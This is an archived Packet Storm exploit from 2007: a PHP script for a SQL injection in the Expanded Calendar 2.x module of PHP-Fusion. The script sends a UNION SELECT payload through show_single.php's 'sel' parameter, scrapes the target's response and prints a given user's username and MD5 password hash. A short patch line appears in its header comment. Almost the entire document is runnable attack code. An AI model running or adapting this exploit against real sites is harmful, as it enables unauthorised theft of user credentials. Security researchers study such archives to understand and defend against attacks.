phpfusionex-sql.txt

2007-10-02T00:00:00
ID PACKETSTORM:59717
Type packetstorm
Reporter Matrix86
Modified 2007-10-02T00:00:00

Description

                                        
                                            `<?php  
print_r("  
/********************************************************  
* Expanded Calendar 2.x (PHP-Fusion module) *  
* User pass disclosure exploit *  
* Found by Matrix86 of Rbt-4 Crew *  
* Site: www.rbt-4.net *  
* Mail: info[at]rbt-4[dot]net *  
*********************************************************  
* Bug found in *  
* /infusions/calendar_events_panel/show_single.php *  
* Line: *  
* 27 *  
* Vulnerability type: Sql injection *  
* Unpatched! *  
* Patch: *  
* Line 26: *  
* if(!isset(\$sel)||!isNum(\$sel)) fallback(\"index.php\");  
*  
********************************************************/  
");  
  
if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [user_id]\nExample: ".$argv[0]." localhost /php-fusion/ 1\n");  
  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",4);  
  
$host = $argv[1];  
$path = $argv[2];  
$user_id = $argv[3];  
$port = 80;  
  
$sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";  
$sqlend = "/*";  
  
function send($req){  
global $host,$port;  
  
$ip = gethostbyname($host);  
if(stristr($host,$ip)) die("Error: Host not found\n");  
  
if(!($sock = fsockopen($ip,$port))) die("Error: unable open sock!\n");  
  
fputs($sock,$req);  
$response = "";  
while (!feof($sock)) {  
$response .= fgets ($sock,128);  
}  
fclose ($sock);  
return $response;  
}  
  
$packet = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0\r\n";  
$packet.= "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko)\r\n";  
$packet.= "Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
echo "Packet:\n".$packet."\n\n";  
  
$resp = send($packet);  
$temp = explode("<td colspan='2'><font size='4'><u>",$resp);  
$temp2 = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>",$temp[1]);  
$temp3 = explode("</td>",$temp2[1]);  
$username = $temp3[0];  
  
if(isset($temp[1])) {  
$md5 = substr($temp[1],0,32);  
echo "Id user: ".$user_id."\nUsername: ".$username."\nPassword: ".$md5."\n";  
}  
else echo("Bug Fixed..sorry!\n");  
  
exit();  
?>  
`